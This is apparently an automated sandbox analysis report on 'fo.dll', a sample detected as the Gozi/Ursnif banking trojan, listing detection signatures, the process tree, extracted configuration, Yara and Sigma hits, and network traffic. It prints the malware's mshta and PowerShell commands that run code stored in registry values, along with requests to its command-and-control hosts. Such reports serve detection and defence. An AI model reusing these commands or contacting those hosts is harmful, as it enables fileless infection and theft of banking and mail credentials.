Analysis Report fo.dll

Overview

General Information

Sample Name: fo.dll
Analysis ID: 334007
MD5: b72c009b01b9321cbcb327cf285ccef7
SHA1: 8599a832cdc973e8949a631c349980c0f41ffc48
SHA256: edf82bc9c74787acbae4fc2a22aa35646616d23b781d6a75a7799a25431398c6

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6736 cmdline: loaddll32.exe 'C:\Users\user\Desktop\fo.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • control.exe (PID: 4544 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 4000 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • iexplore.exe (PID: 6616 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5076 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4652 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5680 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5276 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6756 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8A0A.tmp' 'c:\Users\user\AppData\Local\Temp\b5r2gs3w\CSCC26898CFCBA4739B5B18589DB58EA5A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 4580 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3820 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES97F5.tmp' 'c:\Users\user\AppData\Local\Temp\1dcawf3x\CSCA42BA027116C433D856471BB95F3A1F.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "134", "system": "9c06dc0837d13fc92eb590af08acbac4hhE", "size": "201283", "crc": "2", "action": "00000000", "id": "3300", "time": "1608869150", "user": "f73be0088695dc15e71ab15c41fb0bc7", "hash": "0x0acc6525", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp | GoziRule | Win32.Gozi | CCN-CERT | 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5276, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', ProcessId: 5760
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5680, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5276
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5276, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', ProcessId: 5760
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4 | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4544, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4000

Signature Overview

AV Detection:

Found malware configuration
Source: loaddll32.exe.6736.0.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "134", "system": "9c06dc0837d13fc92eb590af08acbac4hhE", "size": "201283", "crc": "2", "action": "00000000", "id": "3300", "time": "1608869150", "user": "f73be0088695dc15e71ab15c41fb0bc7", "hash": "0x0acc6525", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: fo.dll | Virustotal: Detection: 22%
Machine Learning detection for sample
Source: fo.dll | Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_03144FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_03144FE1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0313888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0313888D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0312E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_0312E0BA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_031305EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_031305EF
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0UwmK9lArxe1S/414MI2ZuaHyc3Hql/pDoGm3pbqcfZ6eH/rIV_2B_2BIwZsV3ugj/LFW12XoXB/5IhYMecPu_2FZ3MO7ToD/UbND3bAbyICPq0DkfXa/IBZ9XP6woLvZlIKyAfQqqI/Uiw5lx_2FvlxN/HMlCb4bo/g8XoEKflv1sBuQnXNE8yNcw/AKDCMRNxF4/MMEe64x10s46GwvXs/NfWSVoItfJCu/ETw0UJmfuPx/MFmlVBYs8cT1cy/upat0gwv0SID/c HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4gdadK/LoRPjWZ1kN2/o8CoNlrTCVbhEo/361jZbmCNrUZVIP5Bhl57/JqyEcDfYivA3dm0O/mky8dRn0ggErrbj/akiw2jijXQRCdNJW8y/iVMNh7InN/9CHIQJtXSEecSzTxafOp/CndbtrwZnb3pGjztd1x/sNuKRnkS3EeHF4W3Svpatj/SuzQoCnLkNFM_/2F9afglr/8gsSDsY68lq9DByv2oLPokh/wgO8nuXPE5/2ZEgLGQD8YpRYIz5b/FeDsfcnAti/dh68UKBF HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi0ui4EgRuQKNmSc2/LHtuPWymhOYZR_2FJDHmxn/_2FrEGE1ZbjAn/1oshEbf_/2FLREWh1LoDUsvxxAvs7QD5/dvnwj8fGqM/x9Cj0InfA93JERgMb/jvGKQ1lz4X9T/7v88BZtQprh/toDQVprzBnQqX7/PNo9bxVHknk7UTjGk71xL/qaOfpUOtZr60DaIJ/Z_2BfcJhSJDle0W/SRI_2FrQNsALZHaCkM/LU1KC3iGK/DvkQcZrlaQKckhwbDOmn/rYJqFe6wJntn8_2FTVZ/m40BS HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/LORfTl2pETMFVU7/wmWsrPQkTKd_2FnRRq/YFsoOxoi6/ZKKr_2BSzTM1ZV_2BmG8/QLf1_2BrD7d9qUhAxps/CGbKC7bT1amoQI1HYUX8R7/wm75uPSfo_2B2/_2FsJFS6/_2BNeXTDBj_2BtQXfJjgc3I/HnVW2zL6rr/joxJeMAoMMP9c2fI0/tMrDLqA_2FiO/Fpvbtyr_2B1/MuEXGCiN9n5YUz/PA_2F9ti0coaJgd_2BIiz/xE1X7ankHr3ko40c/dbREH_2BlZg_2F_/2FFd2SKEDVXMlYpxRv/xrEPDyAVN/y0vUiofeSrtYGhvW4XLQ/LX_2FjAdqFE0fVpb5Hc/94ExhbjQdDmIQdq_2F2tMR/azR HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/ge76nNd2r9i7q/f4m7qnru/ODJiitx5KnO_2FlTKPLiqHN/iN3_2FwnGS/cMz53x6_2BNTJzFKu/GvXWghhznGvj/xuyrdDzhJ8U/ipLoAih5yQdyhW/jYxcE7DfgVGYeA0ymDNSv/2cXxlL4sP4_2B7dE/KscxdpWWxM653_2/B_2Fz0kRfaWcJF5wq8/85RpQlZKe/V8jy_2BSqfOrqvaSuZRQ/jK1M36Z4E2lD5gJWX4u/PXlLACwNTib8qbZUXKDq1s/5q3wJc33iTaAL/UKszY336/PyF_2B_2Fxuh9RQFy7nHHpu/xcXSzckdW9/8jC6GzIl/MxkKpsQ HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/ZlBWB39wHAVH3v/raQmqMGJOifuhaYaKNwxh/IZ_2F6KBArqyCY8b/WbnoycUqXeSUGG9/rcgEljM3y6DLL_2BQV/3c03FGZDQ/pExrtqt50dAd2zPnzL3m/bLVeszfj3J1PKvuTYR5/m2X2vt_2FBD8yHfErKPH45/2RSHFXzCtabu7/yWSpuChs/EzLl2UBJPJU_2BdHaDjN7Dw/524FGLWh_2/BjCBxT8fanf_2FJBl/OiuE4QhSNb2G/hMldz29diPw/4FF40uXsQWZKGL/IAMRrIyJs6o_2BVOaFkq9/SCNXTFsH5uVIx_2F/49xRCH3m7bermao/j HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: FIND US: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: WATCH US: www.youtube.com/g5enter equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: golang.feel500.at
Source: unknown | HTTP traffic detected: POST /api1/GC1ocAtBhowKLdLbTST8/6YRfIHrc1z8aNndqDwy/Rj4cR0tkeWtB5SXs0_2FDA/G_2Bzob9KrYk1/ee238C3Z/JDlyapWA93gE3_2Bp1jTydd/8GEbA8iZ06/e4a5NG_2FcTR_2FK1/ZUyu2uSSJ9F9/DomsqAwIwqE/YoT6M9Yf8a3aZq/kF6U6bm3L2d8juuElHvFK/nLA9fg_2BF9F7d1o/_2FXLVqgOXpmlhi/xiQPBRQ00LlJWSjfVm/ktN1zwUZ8/1L3Jodx29tHs_2FY7FjX/MxbpxkWX3VN69cbK6kU/aqmaWa1G2QstKbyN7jrfLu/a1Wmfh HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 24 Dec 2020 19:05:50 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
